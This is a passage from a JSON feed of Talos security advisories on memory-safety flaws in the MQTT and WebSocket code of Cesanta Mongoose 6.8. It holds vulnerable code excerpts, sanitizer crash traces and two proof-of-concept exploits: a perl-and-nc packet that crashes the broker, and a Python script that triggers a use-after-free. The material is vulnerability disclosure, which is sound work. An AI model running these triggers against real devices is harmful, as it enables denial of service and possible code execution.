0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== Block was alloc'd at\n ==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== \n ==118470== Invalid write of size 2\n ==118470== at 0x4C32723: memcpy@@GLIBC_2.14 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403EBE: mbuf_insert (mongoose.c:1075)\n ==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\n ==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 
0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==118470== Address 0x5ce0790 is 0 bytes inside a block of size 10 free'd\n ==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== Block was alloc'd at\n ==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== \n ==118470== Syscall param socketcall.sendto(msg) points to 
unaddressable byte(s)\n ==118470== at 0x54F799D: send (send.c:26)\n ==118470== by 0x40A40E: mg_write_to_socket (mongoose.c:3316)\n ==118470== by 0x40ACC2: mg_mgr_handle_conn (mongoose.c:3508)\n ==118470== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\n ==118470== by 0x407935: mg_mgr_poll (mongoose.c:2232)\n ==118470== by 0x4022A6: main (mqtt_broker.c:43)\n ==118470== Address 0x5ce0790 is 0 bytes inside a block of size 10 free'd\n ==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== Block was alloc'd at\n ==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n \n\n### 
Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose MQTT Payload Length Remote Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2892"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0399", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0399", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T19:10:22", "description": "### Summary\n\nAn exploitable NULL pointer dereference vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. An MQTT SUBSCRIBE packet can cause a NULL pointer dereference leading to server crash and denial of service. 
An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-476: NULL Pointer Dereference\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nIn the MQTT protocol, a client initiates the connection by sending a CONNECT command, to which a server replies with CONNACK, and then the client proceeds with other commands. In the case of the Mongoose MQTT server, if an out-of-order SUBSCRIBE packet is received by the server, certain uninitialized structures are accessed, which can lead to a NULL pointer dereference and a server crash. Specifically, in the function `mg_mqtt_broker_handle_subscribe`:\n \n \n struct mg_mqtt_session *ss = (struct mg_mqtt_session *) nc->user_data; [1]\n uint8_t qoss[512];\n size_t qoss_len = 0;\n struct mg_str topic;\n uint8_t qos;\n int pos;\n struct mg_mqtt_topic_expression *te;\n \n for (pos = 0;\n (pos = mg_mqtt_next_subscribe_topic(msg, &topic, &qos, pos)) != -1;) {\n qoss[qoss_len++] = qos;\n \n \n ss->subscriptions = (struct mg_mqtt_topic_expression *) realloc(\n ss->subscriptions, sizeof(*ss->subscriptions) * qoss_len); [2]\n \n\nIn the above code, at [1] we see `ss` being initialized to point to `nc->user_data`, which can be NULL when the SUBSCRIBE arrives before a CONNECT has set up the session. At [2] the `ss` pointer is dereferenced to access the `subscriptions` field, which causes a NULL pointer dereference and leads to a server crash. 
This vulnerability can be triggered by sending bytes from the proof of concept to the sample `mqtt_broker` application supplied with the library.\n\n### Crash Information\n \n \n Valgrind output:\n \n \n ==119048== Invalid read of size 8\n ==119048== at 0x40F696: mg_mqtt_broker_handle_subscribe (mongoose.c:10050)\n ==119048== by 0x40FADF: mg_mqtt_broker (mongoose.c:10133)\n ==119048== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==119048== by 0x4071B6: mg_call (mongoose.c:2051)\n ==119048== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==119048== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==119048== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==119048== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==119048== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\n ==119048== by 0x407935: mg_mgr_poll (mongoose.c:2232)\n ==119048== by 0x4022A6: main (mqtt_broker.c:43)\n ==119048== Address 0x30 is not stack'd, malloc'd or (recently) free'd\n ==119048==\n ==119048==\n ==119048== Process terminating with default action of signal 11 (SIGSEGV): dumping core\n ==119048== Access not within mapped region at address 0x30\n ==119048== at 0x40F696: mg_mqtt_broker_handle_subscribe (mongoose.c:10050)\n ==119048== by 0x40FADF: mg_mqtt_broker (mongoose.c:10133)\n ==119048== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==119048== by 0x4071B6: mg_call (mongoose.c:2051)\n ==119048== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==119048== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==119048== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==119048== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==119048== by 0x40B6C9: mg_socket_if_poll (mongoose.c:3694)\n ==119048== by 0x407935: mg_mgr_poll (mongoose.c:2232)\n ==119048== by 0x4022A6: main (mqtt_broker.c:43)\n ==119048== If you believe this happened as a result of a stack\n ==119048== overflow in your program's main thread (unlikely but\n ==119048== possible), you can try to increase the size of 
the\n ==119048== main thread stack using the --main-stacksize= flag.\n ==119048== The main thread stack size used in this run was 8388608.\n ==119048==\n ==119048== HEAP SUMMARY:\n ==119048== in use at exit: 5,698 bytes in 154 blocks\n ==119048== total heap usage: 159 allocs, 5 frees, 7,154 bytes allocated\n ==119048==\n ==119048== LEAK SUMMARY:\n ==119048== definitely lost: 0 bytes in 0 blocks\n ==119048== indirectly lost: 0 bytes in 0 blocks\n ==119048== possibly lost: 0 bytes in 0 blocks\n ==119048== still reachable: 5,698 bytes in 154 blocks\n ==119048== suppressed: 0 bytes in 0 blocks\n ==119048== Rerun with --leak-check=full to see details of leaked memory\n ==119048==\n ==119048== For counts of detected and suppressed errors, rerun with: -v\n ==119048== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)\n Segmentation fault\n \n\n### Exploit Proof-of-Concept\n\nperl -e \u2018print \u201c\\x80\\x86\\x00\\x00AAAA\u201d\u2019 | nc \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose MQTT SUBSCRIBE Command Denial Of Service", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2893"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0400", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0400", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-07T19:10:19", "description": "### Summary\n\nAn exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause an arbitrary out-of=bounds memory read potentially resulting in information disclosure and denial of service. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n8.2 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\n\n### CWE\n\nCWE-190: Integer Overflow or Wraparound\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nWhile parsing an MQTT packet SUBSCRIBE command, topic string size as encoded in the packet is trusted without any additional validation. This arbitrary length value is used in pointer arithmetic and can cause out-of-bounds memory access. 
The vulnerability occurs in function `mg_mqtt_next_subscribe_topic`:\n \n \n int mg_mqtt_next_subscribe_topic(struct mg_mqtt_message *msg,\n struct mg_str *topic, uint8_t *qos, int pos) {\n unsigned char *buf = (unsigned char *) msg->payload.p + pos;\n \n if ((size_t) pos >= msg->payload.len) {\n return -1;\n }\n \n topic->len = buf[0] << 8 | buf[1]; [1]\n topic->p = (char *) buf + 2;\n *qos = buf[2 + topic->len]; [2]\n return pos + 2 + topic->len + 1;\n }\n \n\nIn the above code, at [1] two bytes from the message buffer are read as `topic->len` and then immediately used at [2] to calculate the offset to `qos`. No check is performed to ensure that this offset lies inside the bounds of the buffer, which is limited in size. This issue can be triggered multiple times and, with careful control of the memory layout, could be abused to leak memory and cause denial of service.\n\nThe vulnerability can be triggered by sending the supplied proof of concept packet to the sample `mqtt_broker` application supplied with the library.\n\n### Crash Information\n \n \n Address Sanitizer output:\n ==118728==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000014986 at pc 0x00000051e4c5 bp 0x7fffffffaf50 sp \n 0x7fffffffaf48\n READ of size 1 at 0x619000014986 thread T0\n #0 0x51e4c4 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51e4c4)\n #1 0x515174 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x515174)\n #2 0x4fa825 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fa825)\n #3 0x4fea17 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fea17)\n #4 0x50a8e7 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x50a8e7)\n #5 0x50efa8 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x50efa8)\n #6 0x4fc145 (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4fc145)\n #7 0x4eb5ea (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x4eb5ea)\n #8 0x7ffff683882f (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)\n #9 0x419978 
(/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x419978)\n \n \n AddressSanitizer can not describe address in more detail (wild memory access suspected).\n SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/mqtt_broker/mqtt_broker+0x51e4c4)\n ==118728==ABORTING\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", 
"baseScore": 8.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose MQTT SUBSCRIBE Topic Length Information Leak", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2895"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0402", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0402", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-06-13T22:03:01", "description": "### Summary\n\nAn exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause a buffer to be allocated while leaving stale pointers which leads to a use-after-free vulnerability which can be exploited to achieve remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It\u2019s HTTP implementation includes upgrade support required for websocket applications. 
It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nA websocket frame can be fragmented over multiple packets. Flags in the websocket header specify whether the packet is fragmented and its order. When encountering a first frame fragment, a buffer reallocation causes several pointers to become invalid, but the code doesn\u2019t invalidate or update them, leading to a potential use-after-free condition which can lead to further memory corruption.\n\nIn function `mg_deliver_websocket_data`, responsible for parsing the websocket packet, we observe the following code:\n \n \n if (reass) { [1]\n /* On first fragmented frame, nullify size */\n if (mg_is_ws_first_fragment(wsm.flags)) { [2]\n mbuf_resize(&nc->recv_mbuf, nc->recv_mbuf.size + sizeof(*sizep)); [3]\n p[0] &= ~0x0f; /* Next frames will be treated as continuation */ [4]\n buf = p + 1 + sizeof(*sizep); [5]\n *sizep = 0; /* TODO(lsm): fix. this can stomp over frame data */ [6]\n }\n \n /* Append this frame to the reassembled buffer */ \n memmove(buf, wsm.data, e - wsm.data); [7]\n \n\nIn the above code, if the packet is marked for reassembly (checked at [1]) and is the first fragment (checked at [2]), the receive buffer is resized at [3]. Function `mbuf_resize` actually calls `realloc` to resize the buffer. Calling `realloc` on a buffer to resize it doesn\u2019t guarantee that the same memory will be used: a different heap chunk can be chosen and the original data copied there. This effectively makes the old pointers, which point to the original buffer, invalid. In the above code, stale pointers are reused at [4], [5], [6] and [7] to do memory reads, writes and a memory copy. 
Pointers `p`, `buf`, `e`, `sizep` and `wsm.data` are all initialized based on the original `nc->recv_mbuf` buffer at the beginning of the function:\n \n \n static int mg_deliver_websocket_data(struct mg_connection *nc) {\n /* Using unsigned char *, cause of integer arithmetic below */\n uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len,\n mask_len = 0, header_len = 0;\n unsigned char *p = (unsigned char *) nc->recv_mbuf.buf, *buf = p,\n *e = p + buf_len;\n \n\nCalling `realloc` won\u2019t always invalidate a pointer, but in this case steps can be taken to make that more likely, such as multiple simultaneous network connections. Not invalidating and updating pointers after `realloc` leads to a use-after-free condition which can be abused to cause denial of service and ultimately remote code execution.\n\n### Crash Information\n \n \n Address sanitizer output:\n \n ==88299==ERROR: AddressSanitizer: heap-use-after-free on address 0x619000005f80 at pc 0x00000051b1ee bp 0x7fffffffb490 sp \n 0x7fffffffb488\n READ of size 1 at 0x619000005f80 thread T0\n #0 0x51b1ed in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8874\n #1 0x51b1ed in ?? ??:0\n #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)\n #3 0x5128d4 in ?? ??:0\n #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051\n #5 0x4f9de6 in ?? ??:0\n #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502\n #7 0x4fdcf9 in ?? ??:0\n #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506\n #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372\n #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497\n #11 0x506603 in ?? 
??:0\n #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #13 0x509dd8 in ?? ??:0\n #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #15 0x4fb695 in ?? ??:0\n #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78\n #17 0x4ea65a in ?? ??:0\n #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291\n #19 0x7ffff6ee582f in ?? ??:0\n #20 0x418e58 in _start ??:?\n #21 0x418e58 in ?? ??:0\n \n \n 0x619000005f80 is located 0 bytes inside of 1024-byte region [0x619000005f80,0x619000006380)\n freed by thread T0 here:\n #0 0x4b9308 in realloc ??:?\n #1 0x4b9308 in ?? ??:0\n #2 0x4f0275 in mbuf_resize /home/user/mongoose/examples/websocket_chat/../../mongoose.c:1044 (discriminator 1)\n #3 0x4f0275 in ?? ??:0\n \n \n previously allocated by thread T0 here:\n #0 0x4b8f88 in __interceptor_malloc ??:?\n #1 0x4b8f88 in ?? ??:0\n #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)\n #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)\n #4 0x506453 in ?? ??:0\n #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690\n #6 0x509dd8 in ?? ??:0\n #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232\n #8 0x4fb695 in ?? 
??:0\n #4 0x60200000efef (<unknown module>)\n \n \n SUMMARY: AddressSanitizer: heap-use-after-free (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51b1ed)\n ==88299==ABORTING\n \n\n### Exploit Proof-of-Concept\n \n \n import socket\n import random\n import struct\n import sys\n http_upgrade = ('GET /chat HTTP/1.1\\r\\n'\n 'Host: server.example.com\\r\\n'\n 'Upgrade: websocket\\r\\n'\n 'Connection: Upgrade\\r\\n'\n 'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\\r\\n'\n 'Sec-WebSocket-Protocol: chat, superchat\\r\\n'\n 'Sec-WebSocket-Version: 13\\r\\n'\n 'Origin: http://example.com\\r\\n\\r\\n')\n \n \n payload = \"\\x01\" # need to 
pass two checks:\n \"\"\"\n static int mg_is_ws_fragment(unsigned char flags) {\n return (flags & 0x80) == 0 || (flags & 0x0f) == 0;\n }\n \n \n static int mg_is_ws_first_fragment(unsigned char flags) {\n return (flags & 0x80) == 0 && (flags & 0x0f) != 0;\n }\n \"\"\"\n payload += chr(0x00 | 50 ) # packet doesn't have to be masked, so we can omit it, size doesn't matter\n payload += \"A\"*(60+ random.randint(0,20000)) # rest of the packet doesn't matter\n \"\"\"\n append random length of garbage so it's a bit easier to trigger the realloc when running without ASAN,\n valgrind, or libdislocator, otherwise ~60 is enough\n \"\"\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.send(http_upgrade)\n print s.recv(1024)\n s.send(payload)\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose Websocket Protocol Fragmented Packet Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2922"], "modified": 
"2017-10-31T00:00:00", "id": "TALOS-2017-0429", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0429", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T19:10:18", "description": "### Summary\n\nAn exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT packet over the network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-121: Stack-based Buffer Overflow\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nMQTT SUBSCRIBE command packet can contain multiple topics to subscribe to. If a MQTT SUBSCRIBE packet with upwards of 512 topic subscriptions is sent to the server, an overflow of a stack buffer can lead to an overwrite of adjacent variables or the return address ultimately leading to remote code execution. In function `mg_mqtt_broker_handle_subscribe` topics are handled one by one:\n \n \n uint8_t qoss[512]; [1]\n size_t qoss_len = 0;\n struct mg_str topic;\n uint8_t qos;\n int pos;\n struct mg_mqtt_topic_expression *te;\n \n for (pos = 0;\n (pos = 